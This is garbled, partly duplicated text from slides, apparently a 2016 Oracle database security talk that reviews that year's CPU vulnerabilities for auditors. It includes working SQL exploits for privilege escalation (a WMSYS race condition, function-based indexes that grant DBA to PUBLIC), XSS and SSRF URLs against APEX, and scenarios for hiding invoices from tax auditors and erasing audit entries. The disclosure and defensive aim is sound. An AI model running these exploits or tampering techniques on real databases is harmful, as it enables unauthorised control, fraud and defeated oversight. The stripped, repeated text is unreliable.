Exploit obvious Create Java Sourcehellip
Jan 2016 CPU- CVE-2015-4921
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Status is incorrectly reported if SYS
Auditing is used together with DB Vault
Reporter David Litchfield
Jan 2016 CPU- CVE-2015-4925
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Privilege escalation via Race Condition
in WMSYSLTCOPYFORUPDATE
Reporter David Litchfield
The Oracle Workspace Manager allows a user to version enable database tables This is achieved by creating workspaces which contain the versioned data The Workspace Manager contains a number of PLSQL packages that are used to manage workspaces To function correctly some management actions must be performed with higher privileges than a normal user might have and so to enable this some of the management functions execute with the privileges of the WMSYS user The main workspace manager interface is the LT PLSQL package and this executes with the privileges of the user that calls or invokes LT When privileged work is required to be executed LT calls the LTADM package The LTADM package executes with the privileges of the owner or definer in this case WMSYS WMSYS has a number of very powerful privileges such as CREATE ANY TRIGGER that allows the grantee the privilege to create a trigger in any schema with the exception of the SYS schema
Jan 2016 CPU- CVE-2015-4925
SELECT COUNT() INTO CNTFROM V$OPEN_CURSOR OC V$SQL S V$OBJECT_DEPENDENCY OD WHERE OCSID = USER_SID AND [hellip] AND ODTO_TYPE IN (78911)
Here ODTO_TYPEs 789 and 11 are functions procedures packages and objects If any such dependency exists then the user supplied query will not be executed and an error is raised IF (CNTgt0) THEN WMSYSWM_ERRORRAISEERROR(WMSYSLTWM_ERROR_81_NO) END IF
SQL_STR2 =declaredelstatuses wmsysltUtilnumber_tab beginselect WM_delstatus bulk collect into delstatusesfrom || WMSYSLTUTILGETVN(TABLE_OWNER TAB_NAME _BASE) || where WM_version = || CURVER || and || NEWWHERE_CLAUSE || for updateend WMSYSLTADMEXECSQL(SQL_STR2)
Jan 2016 CPU- CVE-2015-4925SQLgt CONNECT RACERPASSWORD SQLgt CREATE TABLE FOO(X NUMBER CONSTRAINT X_PK PRIMARY KEY(X)) SQLgt INSERT INTO FOO (X) VALUES (1) SQLgt COMMITSQLgt EXEC WMSYSLTENABLEVERSIONING(sbquoFOO)
SQLgt create or replace function Y return number authid current_user is 2 pragma autonomous_transaction3 begin4 dbms_outputput_line(BANG)5 execute immediate create or replace procedure owned(p varchar) is begin execute immediate p end6 execute immediate grant execute on owned to public7 dbms_outputput_line(sys_context(userenvcurrent_user)) 8 return 19 end 10
Jan 2016 CPU- CVE-2015-4925SQLgt GRANT EXECUTE ON Y TO PUBLIC SQLgt CREATE TABLE RACER(Y NUMBER) SQLgt INSERT INTO RACER(Y) VALUES (1) SQLgt COMMIT
SQLgt create or replace procedure attempt_it is 2 begin 3 execute immediate BEGIN WMSYSLTCOPYFORUPDATE(FOOX=LENGTH((SELECT 1 FROM RACERRACER WHERE RACERY=1))) END 4 exception when others then 5 null6 end7 SQLgt declare2 i number=0 3 begin4 for i in 11000 loop 5 execute immediate alter table RACERRACER rename column Y to Z6 execute immediate alter table RACERRACER rename column Z to Y7 end loop 8 end9
Jan 2016 CPU- CVE-2015-4925
SQLgt DESC WMSYSOWNED
PROCEDURE WMSYSOWNED Argument Name Type InOut Default mdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdash-
P VARCHAR2 IN
February 2016
nothing special happened
March 2016
nothing special happened
April 2016
Oracle CPU April 2016
httpwwworaclecomtechnetworktopicssecuritycpuapr2015-2365600html
April 2016 CPU
5 security fixes (2 remote exploitable)
1 Java VM (CVSS 90)
1 OLAP (CVSS 78)
3 RDBMS Security (CVSS 59 33 33 1 remote)
httpwwworaclecomtechnetworksecurity-advisorycpuapr2016v3-2985753html
Apr 2016 CPU- CVE-2016-0690
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem AUDIT NOT EXISTS fails to capture
attempts to execute a procedure that does not
exist either because the user does not have the
execute privilege on it or because the
procedure does not exist If a DBA wants to
capture attempts to execute procedures where
the user does not have the execute privilege we
must also add
Reporter David Litchfield
Exploit
AUDIT EXECUTE PROCEDURE WHENEVER NOT SUCCESSFUL
Apr 2016 CPU- CVE-2016-0691
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem A missing (due to no execute
privilege) function is within a SELECT query the
name of the function is not logged but the
name of the table in the query
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
May 2016
Nothing special happened
June 2016
Nothing special happened
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016 CPU
9 security fixes (5 remote exploitable)
1 OJVM (CVSS 90)
1 JDBC (CVSS 81 remote)
1 Portable Clusterware (CVSS 75 remote)
1 Data Pump (CVSS 67)
2 APEX (CVSS 61 58 2 remote)
1 RDBMS Security (CVSS 53 remote)
DB Shardening (CVSS 44)
1 Database Vault (CVSS 34)
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
Jul 2016 CPU- CVE-2016-3448
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem The HTMLDB_UTIL PLSQL package is
vulnerable to a XSS flaw To access it the
schema (APEX_050000) needs to be specified
first however because the config file whitelists
apex
Reporter David Litchfield
Exploit
httpexamplecomordsapex_050000htmldb_utilJSON_FROM_ARRAYP_COLS=1ampP_NAM E01=XX223E3CH13EOops3CH13EampP_F01=YampP_ROWS=1
Jul 2016 CPU- CVE-2016-3467
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem Apex 5 is vulnerable to a server side
request forgery flaw ie it can be made to connect
to another web server and port regardless of
whether allowed URLs have been configured For
example the request below will connect to
someotherserver on port and POST X as a payload
This can be used as a port scanning mechanism
used to attack systems protected by a firewall etc
Reporter David Litchfield
Exploit
httpexampleordsapex_050000WWV_FLOW_WEBSERVICES_APIMAKE_REQUESTP_U RL=httpsomeotherserverportampp_envelope=X
Apr 2016 CPU- CVE-2016-3488Problem Package dbms_gsm_common allows
to change database parameter without the
admin privileges and restart
Reporter Bruno Cirone
Exploit
exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE)
Jul 2016 CPU- CVE-2016-3488mdash as SYS SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY FALSE -- as user GSMUSER SQLgt exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE) PLSQL-Prozedur erfolgreich abgeschlossen -- as user SYS -Re-Run again after execution of the package SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU- CVE-2016-3484
Problem SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter Alexander Kornbrust
Problem (Details + Exploit laterhellip)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
July 2016 CPU- CVE-2016-3489
Problem Privilege escalation via INDEX privilege
and function based index (FBI)
Reporter Alexander Kornbrust
July 2016 CPU- CVE-2016-3489
mdash Oracle 11204 SYSTEMSQLgt select grantee owner table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = INDEX AND GRANTEE=OWNER and owner=SYS GRANTEE OWNER TABLE_NAME -------------------------------------------------------------------------------------- SYSTEM SYS INCEXP SYSTEM SYS INCFIL SYSTEM SYS INCVID SYSTEMSQLgt CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant select on syslink$ to public 5 COMMIT 6 RETURN FOO 7 END
SQLgt grant execute on getdba to public
July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Oracle Patches
Database Vulnerabilities and CPU
Patch situation is getting better but Oracle 12c
offers a large new playground (=tons of new
features) for security researchers
Problem Just a few people are doing security
research in the database
Nearly 50 of the database vulnerabilities were
foundreported by 2 researchers (David
Litchfield amp Alexander Kornbrust)
Oracle Vulnerabilities 2016
Oracle Vulnerabilities 2016
Number of vulnerabilities in Oracle database increasing again
iexcl 30 findings in 2016 (2015 29 2014 43 2013 13 2012 17)
iexcl 8 remote exploitable bugs (20153 2014 4 2013 7 2012 8 )
bull January 2016 CPU (7 Vulnerabilities ndash 0 remote)
bull April 2016 CPU (5 Vulnerabilities ndash 2 remote)
bull July 2016 CPU (9 Vulnerabilities ndash 5 remote)
bull October 2016 CPU (9 Vulnerabilities ndash 1 remote)
2016
January 2016
Oracle CPU January 2016
Exploiting the Oracle Workspace Manager SQL
Race Condition (David Litchfield)
DB Database Assessment Tool
httpwwworaclecomtechnetworktopicssecuritycpujan2016-2367955html httpwwwdavidlitchfieldcomExploitingtheOracleWorkspaceManagerSQLRaceConditionpdf httpsgithubcomfoospidyDbDat
January 2016 CPU
7 security fixes (No remote exploitable)
1 Java VM (CVSS 90)
1 Workspace Manager (CVSS 65)
2 XML Database (CVSS 55 40)
1 Database Vault (CVSS 40)
1 Security (CVSS 40)
1 XML Developerrsquos Kit (CVSS 40)
httpwwworaclecomtechnetworktopicssecuritycpujan2016-2367955html
Jan 2016 CPU- CVE-2016-0467
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Oracle native auditing fails to capture
bdquoCreate Java Sourceldquo
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
Jan 2016 CPU- CVE-2015-4921
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Status is incorrectly reported if SYS
Auditing is used together with DB Vault
Reporter David Litchfield
Jan 2016 CPU- CVE-2015-4925
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Privilege escalation via Race Condition
in WMSYSLTCOPYFORUPDATE
Reporter David Litchfield
The Oracle Workspace Manager allows a user to version enable database tables This is achieved by creating workspaces which contain the versioned data The Workspace Manager contains a number of PLSQL packages that are used to manage workspaces To function correctly some management actions must be performed with higher privileges than a normal user might have and so to enable this some of the management functions execute with the privileges of the WMSYS user The main workspace manager interface is the LT PLSQL package and this executes with the privileges of the user that calls or invokes LT When privileged work is required to be executed LT calls the LTADM package The LTADM package executes with the privileges of the owner or definer in this case WMSYS WMSYS has a number of very powerful privileges such as CREATE ANY TRIGGER that allows the grantee the privilege to create a trigger in any schema with the exception of the SYS schema
Jan 2016 CPU- CVE-2015-4925
SELECT COUNT() INTO CNTFROM V$OPEN_CURSOR OC V$SQL S V$OBJECT_DEPENDENCY OD WHERE OCSID = USER_SID AND [hellip] AND ODTO_TYPE IN (78911)
Here ODTO_TYPEs 789 and 11 are functions procedures packages and objects If any such dependency exists then the user supplied query will not be executed and an error is raised IF (CNTgt0) THEN WMSYSWM_ERRORRAISEERROR(WMSYSLTWM_ERROR_81_NO) END IF
SQL_STR2 =declaredelstatuses wmsysltUtilnumber_tab beginselect WM_delstatus bulk collect into delstatusesfrom || WMSYSLTUTILGETVN(TABLE_OWNER TAB_NAME _BASE) || where WM_version = || CURVER || and || NEWWHERE_CLAUSE || for updateend WMSYSLTADMEXECSQL(SQL_STR2)
Jan 2016 CPU- CVE-2015-4925SQLgt CONNECT RACERPASSWORD SQLgt CREATE TABLE FOO(X NUMBER CONSTRAINT X_PK PRIMARY KEY(X)) SQLgt INSERT INTO FOO (X) VALUES (1) SQLgt COMMITSQLgt EXEC WMSYSLTENABLEVERSIONING(sbquoFOO)
SQLgt create or replace function Y return number authid current_user is 2 pragma autonomous_transaction3 begin4 dbms_outputput_line(BANG)5 execute immediate create or replace procedure owned(p varchar) is begin execute immediate p end6 execute immediate grant execute on owned to public7 dbms_outputput_line(sys_context(userenvcurrent_user)) 8 return 19 end 10
Jan 2016 CPU- CVE-2015-4925SQLgt GRANT EXECUTE ON Y TO PUBLIC SQLgt CREATE TABLE RACER(Y NUMBER) SQLgt INSERT INTO RACER(Y) VALUES (1) SQLgt COMMIT
SQLgt create or replace procedure attempt_it is 2 begin 3 execute immediate BEGIN WMSYSLTCOPYFORUPDATE(FOOX=LENGTH((SELECT 1 FROM RACERRACER WHERE RACERY=1))) END 4 exception when others then 5 null6 end7 SQLgt declare2 i number=0 3 begin4 for i in 11000 loop 5 execute immediate alter table RACERRACER rename column Y to Z6 execute immediate alter table RACERRACER rename column Z to Y7 end loop 8 end9
Jan 2016 CPU- CVE-2015-4925
SQLgt DESC WMSYSOWNED
PROCEDURE WMSYSOWNED Argument Name Type InOut Default mdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdash-
P VARCHAR2 IN
February 2016
nothing special happened
March 2016
nothing special happened
April 2016
Oracle CPU April 2016
httpwwworaclecomtechnetworktopicssecuritycpuapr2015-2365600html
April 2016 CPU
5 security fixes (2 remote exploitable)
1 Java VM (CVSS 90)
1 OLAP (CVSS 78)
3 RDBMS Security (CVSS 59 33 33 1 remote)
httpwwworaclecomtechnetworksecurity-advisorycpuapr2016v3-2985753html
Apr 2016 CPU- CVE-2016-0690
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem AUDIT NOT EXISTS fails to capture
attempts to execute a procedure that does not
exist either because the user does not have the
execute privilege on it or because the
procedure does not exist If a DBA wants to
capture attempts to execute procedures where
the user does not have the execute privilege we
must also add
Reporter David Litchfield
Exploit
AUDIT EXECUTE PROCEDURE WHENEVER NOT SUCCESSFUL
Apr 2016 CPU- CVE-2016-0691
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem A missing (due to no execute
privilege) function is within a SELECT query the
name of the function is not logged but the
name of the table in the query
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
May 2016
Nothing special happened
June 2016
Nothing special happened
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016 CPU
9 security fixes (5 remote exploitable)
1 OJVM (CVSS 90)
1 JDBC (CVSS 81 remote)
1 Portable Clusterware (CVSS 75 remote)
1 Data Pump (CVSS 67)
2 APEX (CVSS 61 58 2 remote)
1 RDBMS Security (CVSS 53 remote)
DB Shardening (CVSS 44)
1 Database Vault (CVSS 34)
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
Jul 2016 CPU- CVE-2016-3448
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem The HTMLDB_UTIL PLSQL package is
vulnerable to a XSS flaw To access it the
schema (APEX_050000) needs to be specified
first however because the config file whitelists
apex
Reporter David Litchfield
Exploit
httpexamplecomordsapex_050000htmldb_utilJSON_FROM_ARRAYP_COLS=1ampP_NAM E01=XX223E3CH13EOops3CH13EampP_F01=YampP_ROWS=1
Jul 2016 CPU- CVE-2016-3467
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem Apex 5 is vulnerable to a server side
request forgery flaw ie it can be made to connect
to another web server and port regardless of
whether allowed URLs have been configured For
example the request below will connect to
someotherserver on port and POST X as a payload
This can be used as a port scanning mechanism
used to attack systems protected by a firewall etc
Reporter David Litchfield
Exploit
httpexampleordsapex_050000WWV_FLOW_WEBSERVICES_APIMAKE_REQUESTP_U RL=httpsomeotherserverportampp_envelope=X
Apr 2016 CPU- CVE-2016-3488Problem Package dbms_gsm_common allows
to change database parameter without the
admin privileges and restart
Reporter Bruno Cirone
Exploit
exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE)
Jul 2016 CPU- CVE-2016-3488mdash as SYS SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY FALSE -- as user GSMUSER SQLgt exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE) PLSQL-Prozedur erfolgreich abgeschlossen -- as user SYS -Re-Run again after execution of the package SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU- CVE-2016-3484
Problem SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter Alexander Kornbrust
Problem (Details + Exploit laterhellip)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
July 2016 CPU- CVE-2016-3489
Problem Privilege escalation via INDEX privilege
and function based index (FBI)
Reporter Alexander Kornbrust
July 2016 CPU- CVE-2016-3489
mdash Oracle 11204 SYSTEMSQLgt select grantee owner table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = INDEX AND GRANTEE=OWNER and owner=SYS GRANTEE OWNER TABLE_NAME -------------------------------------------------------------------------------------- SYSTEM SYS INCEXP SYSTEM SYS INCFIL SYSTEM SYS INCVID SYSTEMSQLgt CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant select on syslink$ to public 5 COMMIT 6 RETURN FOO 7 END
SQLgt grant execute on getdba to public
July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
